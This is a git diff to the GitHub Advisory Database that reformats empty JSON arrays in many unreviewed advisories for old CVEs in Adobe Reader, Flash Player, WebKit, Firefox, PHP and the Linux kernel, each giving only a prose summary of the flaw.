a/advisories/unreviewed/2022/05/GHSA-qj4w-733c-vfv3/GHSA-qj4w-733c-vfv3.json +++ b/advisories/unreviewed/2022/05/GHSA-qj4w-733c-vfv3/GHSA-qj4w-733c-vfv3.json @@ -7,12 +7,8 @@ "CVE-2010-3631" ], "details": "Array index error in Adobe Reader and Acrobat 8.x before 8.2.5 and 9.x before 9.4 on Mac OS X allows attackers to execute arbitrary code via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-qj57-ph5h-v5hq/GHSA-qj57-ph5h-v5hq.json b/advisories/unreviewed/2022/05/GHSA-qj57-ph5h-v5hq/GHSA-qj57-ph5h-v5hq.json index cabe2e36045..628e1a666c7 100644 --- a/advisories/unreviewed/2022/05/GHSA-qj57-ph5h-v5hq/GHSA-qj57-ph5h-v5hq.json +++ b/advisories/unreviewed/2022/05/GHSA-qj57-ph5h-v5hq/GHSA-qj57-ph5h-v5hq.json @@ -7,12 +7,8 @@ "CVE-2013-1005" ], "details": "WebKit, as used in Apple iTunes before 11.0.3, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2013-05-16-1.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -52,9 +48,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-qjv7-4mwp-qmw5/GHSA-qjv7-4mwp-qmw5.json b/advisories/unreviewed/2022/05/GHSA-qjv7-4mwp-qmw5/GHSA-qjv7-4mwp-qmw5.json index de7718cd66e..1c50fbc6c64 100644 --- a/advisories/unreviewed/2022/05/GHSA-qjv7-4mwp-qmw5/GHSA-qjv7-4mwp-qmw5.json +++ b/advisories/unreviewed/2022/05/GHSA-qjv7-4mwp-qmw5/GHSA-qjv7-4mwp-qmw5.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-qm3q-8q36-x3vh/GHSA-qm3q-8q36-x3vh.json b/advisories/unreviewed/2022/05/GHSA-qm3q-8q36-x3vh/GHSA-qm3q-8q36-x3vh.json index bec6c536983..a5fe807e820 100644 --- a/advisories/unreviewed/2022/05/GHSA-qm3q-8q36-x3vh/GHSA-qm3q-8q36-x3vh.json +++ b/advisories/unreviewed/2022/05/GHSA-qm3q-8q36-x3vh/GHSA-qm3q-8q36-x3vh.json @@ -7,12 +7,8 @@ "CVE-2010-2201" ], "details": "Adobe Reader and Acrobat 9.x before 9.3.3, and 8.x before 8.2.3 on Windows and Mac OS X, allow attackers to execute arbitrary code via a PDF file with crafted Flash content involving the (1) pushstring (0x2C) operator, (2) debugfile (0xF1) operator, and an \"invalid pointer vulnerability\" that triggers memory corruption, a different vulnerability than CVE-2010-1285 and CVE-2010-2168.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -44,9 +40,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-qmvx-3c3m-8hg9/GHSA-qmvx-3c3m-8hg9.json b/advisories/unreviewed/2022/05/GHSA-qmvx-3c3m-8hg9/GHSA-qmvx-3c3m-8hg9.json index cab3d582567..a5e4ee523e0 100644 --- a/advisories/unreviewed/2022/05/GHSA-qmvx-3c3m-8hg9/GHSA-qmvx-3c3m-8hg9.json +++ b/advisories/unreviewed/2022/05/GHSA-qmvx-3c3m-8hg9/GHSA-qmvx-3c3m-8hg9.json @@ -7,12 +7,8 @@ "CVE-2008-5814" ], "details": "Cross-site scripting (XSS) vulnerability in PHP, possibly 5.2.7 and earlier, when display_errors is enabled, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. NOTE: because of the lack of details, it is unclear whether this is related to CVE-2006-0208.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-qp2f-2pc9-9qph/GHSA-qp2f-2pc9-9qph.json b/advisories/unreviewed/2022/05/GHSA-qp2f-2pc9-9qph/GHSA-qp2f-2pc9-9qph.json index 99f4b8ffd56..a6448d9ceb4 100644 --- a/advisories/unreviewed/2022/05/GHSA-qp2f-2pc9-9qph/GHSA-qp2f-2pc9-9qph.json +++ b/advisories/unreviewed/2022/05/GHSA-qp2f-2pc9-9qph/GHSA-qp2f-2pc9-9qph.json @@ -7,12 +7,8 @@ "CVE-2013-5600" ], "details": "Use-after-free vulnerability in the nsIOService::NewChannelFromURIWithProxyFlags function in Mozilla Firefox before 25.0, Firefox ESR 17.x before 17.0.10 and 24.x before 24.1, Thunderbird before 24.1, Thunderbird ESR 17.x before 17.0.10, and SeaMonkey before 2.22 allows remote attackers to execute arbitrary code via vectors involving a blob: URL.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -64,9 +60,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-qpwc-p365-pqrr/GHSA-qpwc-p365-pqrr.json b/advisories/unreviewed/2022/05/GHSA-qpwc-p365-pqrr/GHSA-qpwc-p365-pqrr.json index 61623ff8ed7..00a8bfb5801 100644 --- a/advisories/unreviewed/2022/05/GHSA-qpwc-p365-pqrr/GHSA-qpwc-p365-pqrr.json +++ b/advisories/unreviewed/2022/05/GHSA-qpwc-p365-pqrr/GHSA-qpwc-p365-pqrr.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -59,9 +57,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-qqv9-8j6v-jccf/GHSA-qqv9-8j6v-jccf.json b/advisories/unreviewed/2022/05/GHSA-qqv9-8j6v-jccf/GHSA-qqv9-8j6v-jccf.json index aa22db2e528..1c15fe0d190 100644 --- a/advisories/unreviewed/2022/05/GHSA-qqv9-8j6v-jccf/GHSA-qqv9-8j6v-jccf.json +++ b/advisories/unreviewed/2022/05/GHSA-qqv9-8j6v-jccf/GHSA-qqv9-8j6v-jccf.json @@ -7,12 +7,8 @@ "CVE-2010-2167" ], "details": "Multiple heap-based buffer overflows in Adobe Flash Player before 9.0.277.0 and 10.x before 10.1.53.64, and Adobe AIR before 2.0.2.12610, might allow attackers to execute arbitrary code via unspecified vectors related to malformed (1) GIF or (2) JPEG data.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-qqwr-63rw-jm36/GHSA-qqwr-63rw-jm36.json b/advisories/unreviewed/2022/05/GHSA-qqwr-63rw-jm36/GHSA-qqwr-63rw-jm36.json index cabcc3587ab..f7e52f842bf 100644 --- a/advisories/unreviewed/2022/05/GHSA-qqwr-63rw-jm36/GHSA-qqwr-63rw-jm36.json +++ b/advisories/unreviewed/2022/05/GHSA-qqwr-63rw-jm36/GHSA-qqwr-63rw-jm36.json @@ -7,12 +7,8 @@ "CVE-2008-5423" ], "details": "Sun Sun Ray Server Software 3.x and 4.0 and Sun Ray Windows Connector 1.1 and 2.0 expose the LDAP password during a configuration step, which allows local users to discover the Sun Ray administration password, and obtain admin access to the Data Store and Administration GUI, via unspecified vectors related to the utconfig component of the Server Software and the uttscadm component of the Windows Connector.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-qrjj-37j4-wq7q/GHSA-qrjj-37j4-wq7q.json b/advisories/unreviewed/2022/05/GHSA-qrjj-37j4-wq7q/GHSA-qrjj-37j4-wq7q.json index 057fda5157b..647f220380c 100644 --- a/advisories/unreviewed/2022/05/GHSA-qrjj-37j4-wq7q/GHSA-qrjj-37j4-wq7q.json +++ b/advisories/unreviewed/2022/05/GHSA-qrjj-37j4-wq7q/GHSA-qrjj-37j4-wq7q.json @@ -7,12 +7,8 @@ "CVE-2010-2178" ], "details": "Adobe Flash Player before 9.0.277.0 and 10.x before 10.1.53.64, and Adobe AIR before 2.0.2.12610, allows attackers to cause a denial of service (memory corruption) or possibly execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2010-2160, CVE-2010-2165, CVE-2010-2166, CVE-2010-2171, CVE-2010-2175, CVE-2010-2176, CVE-2010-2177, CVE-2010-2180, CVE-2010-2182, CVE-2010-2184, CVE-2010-2187, and CVE-2010-2188.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-qvcw-45h8-6h3w/GHSA-qvcw-45h8-6h3w.json b/advisories/unreviewed/2022/05/GHSA-qvcw-45h8-6h3w/GHSA-qvcw-45h8-6h3w.json index 287a8fc83c1..c9e073ad211 100644 --- a/advisories/unreviewed/2022/05/GHSA-qvcw-45h8-6h3w/GHSA-qvcw-45h8-6h3w.json +++ b/advisories/unreviewed/2022/05/GHSA-qvcw-45h8-6h3w/GHSA-qvcw-45h8-6h3w.json @@ -7,12 +7,8 @@ "CVE-2011-0567" ], "details": "AcroRd32.dll in Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted image that triggers an incorrect pointer calculation, leading to heap memory corruption, a different vulnerability than CVE-2011-0566 and CVE-2011-0603.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-qvvj-p4wf-226j/GHSA-qvvj-p4wf-226j.json b/advisories/unreviewed/2022/05/GHSA-qvvj-p4wf-226j/GHSA-qvvj-p4wf-226j.json index 459f8b5ccb8..0d508cd5f8a 100644 --- a/advisories/unreviewed/2022/05/GHSA-qvvj-p4wf-226j/GHSA-qvvj-p4wf-226j.json +++ b/advisories/unreviewed/2022/05/GHSA-qvvj-p4wf-226j/GHSA-qvvj-p4wf-226j.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-qwcx-g9pf-v9j5/GHSA-qwcx-g9pf-v9j5.json b/advisories/unreviewed/2022/05/GHSA-qwcx-g9pf-v9j5/GHSA-qwcx-g9pf-v9j5.json index 62669f6172c..b7c2f135b7a 100644 --- a/advisories/unreviewed/2022/05/GHSA-qwcx-g9pf-v9j5/GHSA-qwcx-g9pf-v9j5.json +++ b/advisories/unreviewed/2022/05/GHSA-qwcx-g9pf-v9j5/GHSA-qwcx-g9pf-v9j5.json @@ -7,12 +7,8 @@ "CVE-2010-2207" ], "details": "Adobe Reader and Acrobat 9.x before 9.3.3, and 8.x before 8.2.3 on Windows and Mac OS X, allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2010-1295, CVE-2010-2202, CVE-2010-2209, CVE-2010-2210, CVE-2010-2211, and CVE-2010-2212.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-qxh6-vf7m-96cv/GHSA-qxh6-vf7m-96cv.json b/advisories/unreviewed/2022/05/GHSA-qxh6-vf7m-96cv/GHSA-qxh6-vf7m-96cv.json index 7bc2d123652..d342ae14301 100644 --- a/advisories/unreviewed/2022/05/GHSA-qxh6-vf7m-96cv/GHSA-qxh6-vf7m-96cv.json +++ b/advisories/unreviewed/2022/05/GHSA-qxh6-vf7m-96cv/GHSA-qxh6-vf7m-96cv.json @@ -7,12 +7,8 @@ "CVE-2008-4815" ], "details": "Untrusted search path vulnerability in Adobe Reader and Acrobat 8.1.2 and earlier on Unix and Linux allows attackers to gain privileges via a Trojan Horse program in an unspecified directory that is associated with an insecure RPATH.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -72,9 +68,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-qxh8-75pv-8vmg/GHSA-qxh8-75pv-8vmg.json b/advisories/unreviewed/2022/05/GHSA-qxh8-75pv-8vmg/GHSA-qxh8-75pv-8vmg.json index 7ab50faef62..3b75b319a0a 100644 --- a/advisories/unreviewed/2022/05/GHSA-qxh8-75pv-8vmg/GHSA-qxh8-75pv-8vmg.json +++ b/advisories/unreviewed/2022/05/GHSA-qxh8-75pv-8vmg/GHSA-qxh8-75pv-8vmg.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-r2vp-58v7-7fxf/GHSA-r2vp-58v7-7fxf.json b/advisories/unreviewed/2022/05/GHSA-r2vp-58v7-7fxf/GHSA-r2vp-58v7-7fxf.json index 432a61e594d..59ca943d9e5 100644 --- a/advisories/unreviewed/2022/05/GHSA-r2vp-58v7-7fxf/GHSA-r2vp-58v7-7fxf.json +++ b/advisories/unreviewed/2022/05/GHSA-r2vp-58v7-7fxf/GHSA-r2vp-58v7-7fxf.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-r33q-8fqq-hphj/GHSA-r33q-8fqq-hphj.json b/advisories/unreviewed/2022/05/GHSA-r33q-8fqq-hphj/GHSA-r33q-8fqq-hphj.json index b9b8788ae31..7992d0dbfe2 100644 --- a/advisories/unreviewed/2022/05/GHSA-r33q-8fqq-hphj/GHSA-r33q-8fqq-hphj.json +++ b/advisories/unreviewed/2022/05/GHSA-r33q-8fqq-hphj/GHSA-r33q-8fqq-hphj.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-r3jw-q3j2-jqv3/GHSA-r3jw-q3j2-jqv3.json b/advisories/unreviewed/2022/05/GHSA-r3jw-q3j2-jqv3/GHSA-r3jw-q3j2-jqv3.json index faf30cc69fa..ed7abd5453e 100644 --- a/advisories/unreviewed/2022/05/GHSA-r3jw-q3j2-jqv3/GHSA-r3jw-q3j2-jqv3.json +++ b/advisories/unreviewed/2022/05/GHSA-r3jw-q3j2-jqv3/GHSA-r3jw-q3j2-jqv3.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-r3qg-8jc3-g2mr/GHSA-r3qg-8jc3-g2mr.json b/advisories/unreviewed/2022/05/GHSA-r3qg-8jc3-g2mr/GHSA-r3qg-8jc3-g2mr.json index bfbbe72b3ce..39bca9ac6ff 100644 --- a/advisories/unreviewed/2022/05/GHSA-r3qg-8jc3-g2mr/GHSA-r3qg-8jc3-g2mr.json +++ b/advisories/unreviewed/2022/05/GHSA-r3qg-8jc3-g2mr/GHSA-r3qg-8jc3-g2mr.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-r435-g2mc-22v9/GHSA-r435-g2mc-22v9.json b/advisories/unreviewed/2022/05/GHSA-r435-g2mc-22v9/GHSA-r435-g2mc-22v9.json index dad35b547e1..3d1d1e51889 100644 --- a/advisories/unreviewed/2022/05/GHSA-r435-g2mc-22v9/GHSA-r435-g2mc-22v9.json +++ b/advisories/unreviewed/2022/05/GHSA-r435-g2mc-22v9/GHSA-r435-g2mc-22v9.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-r4m2-p844-p4vg/GHSA-r4m2-p844-p4vg.json b/advisories/unreviewed/2022/05/GHSA-r4m2-p844-p4vg/GHSA-r4m2-p844-p4vg.json index 39a15aa9a5a..4a41473b307 100644 --- a/advisories/unreviewed/2022/05/GHSA-r4m2-p844-p4vg/GHSA-r4m2-p844-p4vg.json +++ b/advisories/unreviewed/2022/05/GHSA-r4m2-p844-p4vg/GHSA-r4m2-p844-p4vg.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-r5xv-c23q-gmv3/GHSA-r5xv-c23q-gmv3.json b/advisories/unreviewed/2022/05/GHSA-r5xv-c23q-gmv3/GHSA-r5xv-c23q-gmv3.json index 9e2f3a80ee7..c910fa5e03f 100644 --- a/advisories/unreviewed/2022/05/GHSA-r5xv-c23q-gmv3/GHSA-r5xv-c23q-gmv3.json +++ b/advisories/unreviewed/2022/05/GHSA-r5xv-c23q-gmv3/GHSA-r5xv-c23q-gmv3.json @@ -7,12 +7,8 @@ "CVE-2013-1001" ], "details": "WebKit, as used in Apple iTunes before 11.0.3, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2013-05-16-1.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -52,9 +48,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-r68f-43vp-85x9/GHSA-r68f-43vp-85x9.json b/advisories/unreviewed/2022/05/GHSA-r68f-43vp-85x9/GHSA-r68f-43vp-85x9.json index 915388babce..d4a77824ba1 100644 --- a/advisories/unreviewed/2022/05/GHSA-r68f-43vp-85x9/GHSA-r68f-43vp-85x9.json +++ b/advisories/unreviewed/2022/05/GHSA-r68f-43vp-85x9/GHSA-r68f-43vp-85x9.json @@ -7,12 +7,8 @@ "CVE-2008-4821" ], "details": "Adobe Flash Player 9.0.124.0 and earlier, when a Mozilla browser is used, does not properly interpret jar: URLs, which allows attackers to obtain sensitive information via unknown vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-r7cp-gqhf-qm59/GHSA-r7cp-gqhf-qm59.json b/advisories/unreviewed/2022/05/GHSA-r7cp-gqhf-qm59/GHSA-r7cp-gqhf-qm59.json index 9e159e68973..9b2c9b7efac 100644 --- a/advisories/unreviewed/2022/05/GHSA-r7cp-gqhf-qm59/GHSA-r7cp-gqhf-qm59.json +++ b/advisories/unreviewed/2022/05/GHSA-r7cp-gqhf-qm59/GHSA-r7cp-gqhf-qm59.json @@ -7,12 +7,8 @@ "CVE-2014-4167" ], "details": "The L3-agent in OpenStack Neutron before 2013.2.4, 2014.x before 2014.1.2, and Juno before Juno-2 allows remote authenticated users to cause a denial of service (IPv4 address attachment outage) by attaching an IPv6 private subnet to a L3 router.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -36,9 +32,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "LOW", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-r84w-ppw7-p443/GHSA-r84w-ppw7-p443.json b/advisories/unreviewed/2022/05/GHSA-r84w-ppw7-p443/GHSA-r84w-ppw7-p443.json index 74a6f2ab7cf..d01fdea856b 100644 --- a/advisories/unreviewed/2022/05/GHSA-r84w-ppw7-p443/GHSA-r84w-ppw7-p443.json +++ b/advisories/unreviewed/2022/05/GHSA-r84w-ppw7-p443/GHSA-r84w-ppw7-p443.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-r9q8-r7xg-vx6c/GHSA-r9q8-r7xg-vx6c.json b/advisories/unreviewed/2022/05/GHSA-r9q8-r7xg-vx6c/GHSA-r9q8-r7xg-vx6c.json index 1d9d354f336..ad0c7dfc17c 100644 --- a/advisories/unreviewed/2022/05/GHSA-r9q8-r7xg-vx6c/GHSA-r9q8-r7xg-vx6c.json +++ b/advisories/unreviewed/2022/05/GHSA-r9q8-r7xg-vx6c/GHSA-r9q8-r7xg-vx6c.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-rfcj-cqpr-8hfp/GHSA-rfcj-cqpr-8hfp.json b/advisories/unreviewed/2022/05/GHSA-rfcj-cqpr-8hfp/GHSA-rfcj-cqpr-8hfp.json index ba94185bbda..29313993263 100644 --- a/advisories/unreviewed/2022/05/GHSA-rfcj-cqpr-8hfp/GHSA-rfcj-cqpr-8hfp.json +++ b/advisories/unreviewed/2022/05/GHSA-rfcj-cqpr-8hfp/GHSA-rfcj-cqpr-8hfp.json @@ -7,12 +7,8 @@ "CVE-2013-0998" ], "details": "WebKit, as used in Apple iTunes before 11.0.3, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2013-05-16-1.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -52,9 +48,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-rgw3-fq9h-vvg7/GHSA-rgw3-fq9h-vvg7.json b/advisories/unreviewed/2022/05/GHSA-rgw3-fq9h-vvg7/GHSA-rgw3-fq9h-vvg7.json index ace4e9f070f..190480e49f0 100644 --- a/advisories/unreviewed/2022/05/GHSA-rgw3-fq9h-vvg7/GHSA-rgw3-fq9h-vvg7.json +++ b/advisories/unreviewed/2022/05/GHSA-rgw3-fq9h-vvg7/GHSA-rgw3-fq9h-vvg7.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-rh4v-599x-fwm9/GHSA-rh4v-599x-fwm9.json b/advisories/unreviewed/2022/05/GHSA-rh4v-599x-fwm9/GHSA-rh4v-599x-fwm9.json index d9e07762032..8f7aed5d1b1 100644 --- a/advisories/unreviewed/2022/05/GHSA-rh4v-599x-fwm9/GHSA-rh4v-599x-fwm9.json +++ b/advisories/unreviewed/2022/05/GHSA-rh4v-599x-fwm9/GHSA-rh4v-599x-fwm9.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-rhg8-59hr-g9r4/GHSA-rhg8-59hr-g9r4.json b/advisories/unreviewed/2022/05/GHSA-rhg8-59hr-g9r4/GHSA-rhg8-59hr-g9r4.json index 037999e2a6e..deff8d96ac0 100644 --- a/advisories/unreviewed/2022/05/GHSA-rhg8-59hr-g9r4/GHSA-rhg8-59hr-g9r4.json +++ b/advisories/unreviewed/2022/05/GHSA-rhg8-59hr-g9r4/GHSA-rhg8-59hr-g9r4.json @@ -7,12 +7,8 @@ "CVE-2008-4823" ], "details": "Cross-site scripting (XSS) vulnerability in Adobe Flash Player 9.0.124.0 and earlier allows remote attackers to inject arbitrary web script or HTML via vectors related to loose interpretation of an ActionScript attribute.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-rp26-xpx7-jc9x/GHSA-rp26-xpx7-jc9x.json b/advisories/unreviewed/2022/05/GHSA-rp26-xpx7-jc9x/GHSA-rp26-xpx7-jc9x.json index 4798a122be2..7b525e687f4 100644 --- a/advisories/unreviewed/2022/05/GHSA-rp26-xpx7-jc9x/GHSA-rp26-xpx7-jc9x.json +++ b/advisories/unreviewed/2022/05/GHSA-rp26-xpx7-jc9x/GHSA-rp26-xpx7-jc9x.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-rp6h-cpcg-rw4q/GHSA-rp6h-cpcg-rw4q.json b/advisories/unreviewed/2022/05/GHSA-rp6h-cpcg-rw4q/GHSA-rp6h-cpcg-rw4q.json index adf4282a859..cca04d14c33 100644 --- a/advisories/unreviewed/2022/05/GHSA-rp6h-cpcg-rw4q/GHSA-rp6h-cpcg-rw4q.json +++ b/advisories/unreviewed/2022/05/GHSA-rp6h-cpcg-rw4q/GHSA-rp6h-cpcg-rw4q.json @@ -7,12 +7,8 @@ "CVE-2015-2041" ], "details": "net/llc/sysctl_net_llc.c in the Linux kernel before 3.19 uses an incorrect data type in a sysctl table, which allows local users to obtain potentially sensitive information from kernel memory or possibly have unspecified other impact by accessing a sysctl entry.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -84,9 +80,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-rpgg-xqp6-2g22/GHSA-rpgg-xqp6-2g22.json b/advisories/unreviewed/2022/05/GHSA-rpgg-xqp6-2g22/GHSA-rpgg-xqp6-2g22.json index 7637579939b..47d67f149f4 100644 --- a/advisories/unreviewed/2022/05/GHSA-rpgg-xqp6-2g22/GHSA-rpgg-xqp6-2g22.json +++ b/advisories/unreviewed/2022/05/GHSA-rpgg-xqp6-2g22/GHSA-rpgg-xqp6-2g22.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-rr7g-hmc4-3pm3/GHSA-rr7g-hmc4-3pm3.json b/advisories/unreviewed/2022/05/GHSA-rr7g-hmc4-3pm3/GHSA-rr7g-hmc4-3pm3.json index 4b50d449080..1a5246db474 100644 --- a/advisories/unreviewed/2022/05/GHSA-rr7g-hmc4-3pm3/GHSA-rr7g-hmc4-3pm3.json +++ b/advisories/unreviewed/2022/05/GHSA-rr7g-hmc4-3pm3/GHSA-rr7g-hmc4-3pm3.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-rrhw-9hrp-fr9r/GHSA-rrhw-9hrp-fr9r.json b/advisories/unreviewed/2022/05/GHSA-rrhw-9hrp-fr9r/GHSA-rrhw-9hrp-fr9r.json index 3bc6588e817..32a71cfb63b 100644 --- 